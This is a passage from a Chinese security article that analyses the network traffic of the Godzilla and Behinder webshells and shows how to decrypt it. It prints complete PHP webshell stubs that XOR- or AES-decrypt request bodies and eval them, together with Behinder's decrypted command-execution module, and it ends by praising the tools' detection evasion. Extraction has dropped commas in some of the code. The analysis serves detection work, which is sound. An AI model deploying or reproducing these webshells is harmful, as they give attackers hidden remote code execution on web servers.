if(function_existsEx("fopen")&&function_existsEx("fwrite")&&function_existsEx("fseek")){ $handle=fopen($fileName,"ab"); if ($handle!==false){ fseek($handle,$position); $len=fwrite($handle,$fileContents); @fclose($handle); if ($len!==false){ return "ok"; }elsereturn "cannot write file"; } }elsereturn "cannot open file"; } }else if (function_existsEx("file_put_contents")){ if (file_put_contents($fileName,$fileContents,FILE_APPEND)!==false){ return "ok"; }elsereturn "writer fail"; } }elsereturn "no function"; } } function canCallGzipEncode(){ if (function_existsEx("gzencode")){ return "1"; }elsereturn "0"; } } function canCallGzipDecode(){ if (function_existsEx("gzdecode")){ return "1"; }elsereturn "0"; } } function bytesToInteger($bytes$position) { $val = 0$val = $bytes[$position + 3] & 0xff; $val <<= 8$val |= $bytes[$position + 2] & 0xff; $val <<= 8$val |= $bytes[$position + 1] & 0xff; $val <<= 8$val |= $bytes[$position] & 0xff; return $val; } function isGzipStream($bin){ if (strlen($bin)>=2){ $bin=substr($bin,0,2); $strInfo = @unpack("C2chars"$bin); $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); switch ($typeCode) { case 31139return true; default: return false; } }elsereturn false; } } function getBytes($string) { $bytes = array(); for($i = 0$i < strlen($string); $i++){ array_push($bytes,ord($string[$i])); } return $bytes; }

内容包含了文件操作、执行命令等诸多模块,方便后续调用。

PHP_EVAL_XOR_BASE64

这个shell脚本并无特别,上传一句话脚本即可。在流量上与PHP_XOR_BASE64的区别很明显:PHP_XOR_BASE64是key=加密内容,PHP_EVAL_XOR_BASE64是pass=加密内容&key=加密内容,那么我们需要关注的是pass后面跟了什么内容,由流量可得:

pass=eval%28base64_decode%28strrev%28urldecode%28%27
url解码:
pass=eval(base64_decode(strrev(urldecode('

即是这段加密信息解密的方法:

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

将加密url解密后:

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

再将代码逆序排列:

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

然后再base64解码:


// Decoded PHP_EVAL_XOR_BASE64 first stage. On the wire the pass= parameter is
// a constant eval(base64_decode(strrev(urldecode('...')))) wrapper (see the
// prose above), and unwrapping it yields this: the PHP_XOR_BASE64 stub with
// $pass='key'. The actual XOR+base64 payload therefore travels in key=, and
// the session caching and md5-framed response are the same as in that stub.
@session_start();
@set_time_limit(0);
@error_reporting(0);
// Byte-wise XOR with $K[($i+1)&15]; self-inverse, used in both directions.
function encode($D,$K){
  for($i=0;$i<strlen($D);$i++) {
    $c = $K[$i+1&15];
    $D[$i] = $D[$i]^$c;
  }
  return $D;
}
$pass='key';   // the only difference from the plain PHP_XOR_BASE64 stub
$payloadName='payload';
$key='3c6e0b8a9c15224a';   // first 16 hex chars of md5(<shell password>)
if (isset($_POST[$pass])){
  $data=encode(base64_decode($_POST[$pass]),$key);
  if (isset($_SESSION[$payloadName])){
    // Payload cached in the session by the first request; only $data is new.
    $payload=encode($_SESSION[$payloadName],$key);
    if (strpos($payload,"getBasicsInfo")===false){
      $payload=encode($payload,$key);
    }
    eval($payload);
    // Fixed md5 prefix/suffix around a base64 body: the response signature.
    echo substr(md5($pass.$key),0,16);
    echo base64_encode(encode(@run($data),$key));
    echo substr(md5($pass.$key),16);
  }else{
    // First request: store the payload XOR-ed; nothing is echoed back.
    if (strpos($data,"getBasicsInfo")!==false){
      $_SESSION[$payloadName]=encode($data,$key);
    }
  }
}

即是PHP_XOR_BASE64的默认shell,至于后面key的编码和PHP_XOR_BASE64解密方法一致,可参考上面小节。

PHP_XOR_RAW

对应的默认木马文件:

<?php
// Godzilla "PHP_XOR_RAW" shell stub. Unlike PHP_XOR_BASE64 there is no
// base64 layer and no named POST parameter: the whole request body is XOR-ed
// bytes and the response is XOR-ed bytes with no md5 framing, so neither
// direction carries printable markers. What remains observable is a POST
// with an opaque binary body plus the session cookie set on the first hit.
@session_start();
@set_time_limit(0);
@error_reporting(0);
// Byte-wise XOR with $K[($i+1)&15]; self-inverse, used in both directions.
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';   // first 16 hex chars of md5(<shell password>)
$data=file_get_contents("php://input");   // raw body, no parameter name
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        // Payload cached in the session by the first request.
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo encode(@run($data),$key);   // response: raw XOR-ed bytes only
    }else{
        // First request: store the payload XOR-ed; nothing is echoed back.
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

根据shell可以看出,解密过程更简单一点,但需要提取二进制数据进行解密,直接用wireshark提取有点麻烦,于是在哥斯拉的shell里添加了:

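// Analyst instrumentation added to the PHP_XOR_RAW stub inside the sandbox
// (presumably right after php://input is read, so the file holds the XOR-ed
// body): dumps the raw request bytes to raw.txt for offline decoding instead
// of carving them out of a capture. file_put_contents is binary-safe, so the
// file contains exactly the bytes received. (The comma was lost in extraction.)
$b = file_put_contents('raw.txt', $data);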

将二进制文本存了下来,然后直接读取解密:

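<?php
// Offline decoder for the raw body dumped by the instrumented PHP_XOR_RAW
// stub. It runs standalone, so keep diagnostics visible instead of copying
// the shell's silencing prologue: a missing file or wrong key should fail
// loudly, not print an empty page. No session is needed here.
error_reporting(E_ALL);
ini_set('display_errors', '1');
@set_time_limit(0);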
function encode($D,$K){
    // Byte-wise XOR of $D with the key byte $K[($i + 1) & 15]; a 16-byte key
    // is assumed. XOR is its own inverse, so the same call decodes captured
    // traffic and re-encodes it. Works in place on the local copy of $D.
    $length = strlen($D);
    $pos = 0;
    while ($pos < $length) {
        $D[$pos] = $D[$pos] ^ $K[($pos + 1) & 15];
        $pos++;
    }
    return $D;
}
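// Key of the shell whose traffic is being decoded: the first 16 hex chars of
// md5(<password set when the shell was generated>), as written into the stub.
$key = '3c6e0b8a9c15224a';

// raw.txt holds the bytes the instrumented stub wrote from php://input: the
// request body XOR-ed with $key, with no base64 layer.
$file_path = "raw.txt";

if (!is_file($file_path)) {
    echo 'raw.txt not found: dump the request body with the instrumented shell first.';
    exit(1);
}

// Read the bytes as-is. file_get_contents is binary-safe, so no CRLF
// normalisation is wanted: rewriting "\r\n" would corrupt any ciphertext
// bytes that happen to form that pair, and it also avoids the unclosed
// handle and the fread(..., 0) failure on an empty file in the fopen form.
$post = file_get_contents($file_path);
if ($post === false || $post === '') {
    echo 'raw.txt is empty or unreadable.';
    exit(1);
}

$data = encode($post, $key);

echo "<br/>";
echo "<br/>";
// The result is attacker-supplied PHP source; escape it so the browser shows
// it as text rather than interpreting it as markup.
echo '<pre>' . htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';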

冰蝎3.0

这里还是以php为例,默认shell如下:

<?php
// Behinder (冰蝎) 3.0 default PHP stub. The request body is the AES-encrypted
// (or, without openssl, base64+XOR) string "func|params"; params is PHP
// source that is eval()'d. The key is kept in the session so the eval'd
// payload can encrypt its reply with it.
@error_reporting(0);
session_start();
    $key="a02439ec229d8be0"//this key is the first 16 chars of the 32-char md5 of the connection password; default connection password: POST
    // NOTE(review): the ';' after the assignment above and the commas in the
    // openssl_decrypt() call below were lost in extraction.
    $_SESSION['k']=$key;      // read back by the payload's encrypt() for the reply
    session_write_close();
    $post=file_get_contents("php://input");   // raw body, no parameter name
    if(!extension_loaded('openssl'))
    {
        // Fallback when openssl is absent: base64, then XOR with
        // $key[($i+1)&15]. The function name is assembled from two string
        // pieces, presumably so the literal does not appear in the file.
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        // AES-128 (CBC per the article's decryption settings below) with the
        // 16-char hex string used directly as the key and no IV argument;
        // openssl_decrypt's default options mean the body is base64 text.
        $post=openssl_decrypt($post"AES128"$key);
    }
    // Plaintext layout: "<func>|<php code>"; only the second part is used.
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    // eval() reached through an invokable class and call_user_func rather
    // than a direct call — the "class C{...__invoke" / "call_user_func(new C()"
    // pair is a recognisable stub signature.
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

由shell可知冰蝎对恶意代码进行了AES加密,这里解密需要密钥,而密钥由所设置连接密码的32位md5值的前16位组成,整体解法并不复杂。

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

AES加密模式:CBC,填充:pkcs7padding,密钥长度:128位,密钥:a02439ec229d8be0:

Pssert|eval(base64_decode('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'));

将内容base64解密:

// Start of the decrypted Behinder request body: plain PHP that the stub
// eval()s. Errors are silenced first so a failing command leaves no trace
// in the server's error output.
@error_reporting(0);

function getSafeStr($str){
    // Round-trip the input UTF-8 -> GBK -> UTF-8 with unconvertible bytes
    // dropped. If it survives unchanged it is returned as-is; otherwise the
    // input is treated as GBK and converted to UTF-8. Loose (==) comparison,
    // as in the original.
    $asGbk = iconv('utf-8', 'gbk//IGNORE', $str);
    $back = iconv('gbk', 'utf-8//IGNORE', $asGbk);
    if ($back != $str) {
        return iconv('gbk', 'utf-8//IGNORE', $str);
    }
    return $back;
}
/**
 * Behinder 3.0 "exec" module as recovered from the decrypted request body.
 *
 * Runs $cmd through the first usable one of system / proc_open / passthru /
 * shell_exec / exec / popen (skipping names listed in disable_functions) and
 * echoes encrypt(json_encode(['status' => b64, 'msg' => b64]), key), where
 * key is the $_SESSION['k'] stored by the stub. A reply is therefore a JSON
 * object with two base64 fields under the same AES128/XOR layer as the
 * request — the shape to expect when decrypting captured responses.
 * $path is accepted but never used in this body.
 *
 * NOTE(review): commas were dropped from several lines when this page was
 * extracted (ini_set, preg_replace, explode, array_map, the is_callable /
 * in_array calls, proc_open, exec, popen, fread); the listing is not
 * runnable as printed.
 */
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time'0);
    $result = array();
    // disable_functions is normalised into a list so each candidate exec
    // function can be checked against it below.
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/'','$PadtJn);
        $PadtJn = explode(','$PadtJn);
        $PadtJn = array_map('trim'$PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    // stderr is merged into the output only on Windows. (strtolower(PHP_OS)
    // also contains "win" on Darwin, so macOS gets the suffix too.)
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    // is_callable / in_array are invoked through string variables, presumably
    // to keep the literal names out of the payload body.
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system'and ! $Bvce('system'$PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open'and ! $Bvce('proc_open'$PadtJn)) {
        // Only stdout (pipe 1) is collected; the stderr pipe is opened but
        // never read.
        $handle = proc_open($carray(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru'and ! $Bvce('passthru'$PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec'and ! $Bvce('shell_exec'$PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec'and ! $Bvce('exec'$PadtJn)) {
        $kWJW = array();
        exec($c$kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec'and ! $Bvce('popen'$PadtJn)) {
        // NOTE: tests is_callable('exec') but then calls popen — looks like a
        // copy-paste slip in the payload; only the disable_functions check
        // actually covers popen here.
        $fp = popen($c'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp1024);
            }
        }
        @pclose($fp);
    } else {
        // No exec primitive available: same JSON shape, status "fail".
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    // Success: command output (charset-normalised by getSafeStr) base64'd
    // inside the JSON, then encrypted with the session key.
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

/**
 * Response-side counterpart of the stub's decrypt step.
 *
 * Without openssl: plain XOR with $key[($i+1)&15] and no base64 layer
 * (the stub base64-decodes requests before XOR-ing, so the two directions
 * are not symmetric). With openssl: openssl_encrypt(..., "AES128", $key),
 * whose default options return base64 text, so an encrypted reply body is
 * printable base64; no IV argument is given.
 *
 * NOTE(review): the commas in the openssl_encrypt() call were lost in
 * extraction.
 */
function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data"AES128"$key);
        }
// The command and working directory are shipped base64-encoded inside the
// eval'd code itself (the decoded command is quoted after this listing), so
// the plaintext command only appears after two decode layers: AES/XOR on the
// body, then base64 here. Signature matching on the command text must
// account for both.
}$cmd="Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcIiZ3aG9hbWk=";$cmd=base64_decode($cmd);$path="RDovcGhwc3R1ZHlfcHJvL1dXVy8=";$path=base64_decode($path);
main($cmd,$path);

而cmd内容即为执行内容:

cd /d "D:\phpstudy_pro\WWW\"&whoami

小小总结

这些webshell被大家所使用不仅仅是在当时出现时可绕过大部分流量检测,独特的请求方式,和免杀,还有他们与时俱进的各种功能,内网穿透、内存马等等,实现一键去日内网,随着检测手段加强和内网利用手段的增多,相信也会有新的绕过方法和功能出现。

https://www.freebuf.com/sectool/285693.html
https://xz.aliyun.com/t/10556
http://www.wjhsh.net/0daybug-p-12004574.html

文章来源: https://mp.weixin.qq.com/s?__biz=Mzg3NzczOTA3OQ==&mid=2247485690&idx=1&sn=560666783b064fa184117f29d406d471&chksm=cf1f25d2f868acc4b50bbd1a26d9c306245e070b66acc9ce829d99d31031ec6837a55a491a77&scene=58&subscene=0#rd